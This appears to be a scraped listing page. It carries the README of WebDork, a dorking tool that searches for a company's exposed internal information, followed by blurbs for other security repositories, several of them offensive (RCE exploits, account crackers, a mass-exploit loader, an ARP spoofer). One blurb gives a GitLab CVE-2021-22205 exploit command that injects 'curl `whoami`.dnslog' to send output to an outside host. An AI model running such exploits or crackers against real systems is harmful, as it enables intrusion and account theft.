A Python tool to automate some dorking stuff to find information disclosures.

Overview


webdork
WebDork v1.0.3

A open-source tool to find publicly available sensitive information about Companies/Organisations!

WebDork

A Python tool to automate some dorking stuff to find information disclosures. Suggestions and issues are welcome because I know codes can never be perfect.

Note:

As a user of this tool you agree this terms:

I will not use it for any blackhat/unethical work
I will not disclose any information found by this tool

Not all results found by this tool are sensitive information. If you find any information using this tool you must verify it by yourself and check whether the information can really cause any major/minor harm to A company.

Example finds:

  • Backend related information.
  • Company's/Orgnisation's future/internal plans/mindmaps.
  • Internal tools.

Compatibility

Check your Python version by typing in

$ python --version

If you get the following

Python 3.9.0

or any version greater than or equal to 3.9, this script has been tested and confirmed to be supported.

Installation

For termux

pkg install git -y 
pkg install python -y 
git clone https://github.com/HACKE-RC/webdork
cd webdork
python termux-setup.py

For iSH

apk add git
apk add python3
apk add py3-pip
git clone https://github.com/HACKE-RC/webdork
cd webdork
python setup.py

For Debian-based GNU/Linux distributions

git clone https://github.com/HACKE-RC/webdork
cd webdork
sudo python3 setup.py

Usage:

Help menu of the tool

webdork -h
usage: main.py [-h] -cn Company name [-bw] [--show] [-o Output] [-v] [-s] [--no-save-output]

A python tool to automatically dork on a given company\'s name.

optional arguments:
  -h, --help            show this help message and exit
  -cn Company name, --company-name Company name
                        Name of the company
  -bw, --browser        Search the dorks in browser.
  --show                Print results from the dorks.
  -o Output             Output filename(default is dorkresults.txt).
  -v, --verbose         Turn verbose mode on.
  -s, --silent          Just save the results without printing anything.
  --no-save-output      Don\'t save the output in file.

Example usage:

webdork -cn Hackerone -bw --show -v -o output.txt

Arguments :

  • Company/Organisation name to search for : -cn
  • Open the dorks in browser : -bw, --browser
  • Show dork results in terminal : --show
  • Output filename : -o
  • Better output : -v, --verbose
  • Directly save the results without printing anything : -s, --silent
  • Do not save the result in any file : --no-save-output

Shoutout :

If you like my work consider contacting me on Twitter @coder_rc for donation related information.

Demonstrative Video:

Made with so much debugging by RC

Owner
Rahul rc
Just a kid who loves to hack and code.
Rahul rc
RedDrop is a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives.

RedDrop Exfil Server Check out the accompanying MaverisLabs Blog Post Here! RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers,

53 Nov 01, 2022
Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

Leon Jacobs 307 Dec 24, 2022
Mad Spammer is a python webhook spammer which is very easy and safe to use.

Mad Spammer ๐Ÿ‘ฟ Pre-Setup: Open your terminal/console and type: pip install module colorama python MadSpammer.py Setup: After doing that, you should be

1 Nov 26, 2021
Installation of hacking tools

Tools-Spartan This is a program that makes it easy for you to download and install tools used in Kali Linux, there are tons of tools available.

1 Nov 10, 2021
D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation time by modifying IDA Pro microcode.

Introduction fork from https://gitlab.com/eshard/d810 What is D-810 D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation

Banny 30 Dec 06, 2022
Tool to decrypt iOS apps using r2frida

r2flutch Yet another tool to decrypt iOS apps using r2frida. Requirements It requires to install Frida on the Jailbroken iOS device: Jailbroken device

Murphy 146 Jan 03, 2023
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 ๅฝฑๅ“็‰ˆๆœฌ๏ผš Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Get related domains / subdomains by looking at Google Analytics IDs

DomainRelationShips โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ

Josuรฉ Encinar 161 Jan 02, 2023
Web Headers Security Scanner

Web Headers Security Scanner

Emre Koybasi 3 Dec 16, 2022
We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. ๐Ÿ•ต๏ธ

Pardus Lookout We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. The application i

Ahmet Furkan DEMIR 19 Nov 18, 2022
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Binary Defense 144 Nov 19, 2022
SEBUAH TOOLS TERMUX CRACK AKUN FF HOMKI AKUN EPEP DAH SATU FOLLOW AE YA BROO AWOKWOK

print " INSTALL TOOLS " $ pkg update && upgrade $ pkg install python2 $ pkg install git $ pip2 install lolcat $ pip2 install bs4 $ pip2 install reques

Jeeck 2 Nov 29, 2021
This is a Cryptographied Password Manager, a tool for storing Passwords in a Secure way

Cryptographied Password Manager This is a Cryptographied Password Manager, a tool for storing Passwords in a Secure way without using external Service

Francesco 3 Nov 23, 2022
CVE-2021-44228 log4j 2.x rceๆผๆดžๆฃ€ๆต‹ๅทฅๅ…ท

#1 ไฝฟ็”จ่ฏดๆ˜Ž CVE-2021-44228 log4j 2.x rceๆผๆดžๆฃ€ๆต‹ๅทฅๅ…ท๏ผŒๅฏน็›ฎๆ ‡้“พๆŽฅๅ‘่ตทget่ฏทๆฑ‚ๅนถๅˆฉ็”จdnslogๆŽขๆต‹ๆ˜ฏๅฆๆœ‰ๅ›žๆ˜พ $ python3 log4j-scan.py -h

CoCo ainrm- 4 Jan 13, 2022
Fast Fb Cracking Tool

fb-brute Fast Fb Cracking Tool ๐Ÿ†

Aryan 8 Jun 29, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 04, 2022
A Safer PoC for CVE-2022-22965 (Spring4Shell)

Safer_PoC_CVE-2022-22965 A Safer PoC for CVE-2022-22965 (Spring4Shell) Functionality Creates a file called CVE_2022-22965_exploited.txt in the tomcat

Colin Cowie 46 Nov 12, 2022
An ARP Spoofer attacker for windows to block away devices from your network.

arp0_attacker An ARP Spoofer-attacker for Windows -OS to block away devices from your network. INFO Built in Python 3.8.2. arp0_attackerx.py is Upgrad

Wh0_ 15 Mar 17, 2022
OpenPort scanner GUI tool (CNMAP)

CNMAP-GUI- OpenPort scanner GUI tool (CNMAP) as you know it is the advanced tool to find open port, firewalls and we also added here heartbleed scanni

9 Mar 05, 2022
Trustme: #1 quality TLS certs while you wait

trustme: #1 quality TLS certs while you wait You wrote a cool network client or server. It encrypts connections using TLS. Your test suite needs to ma

479 Dec 27, 2022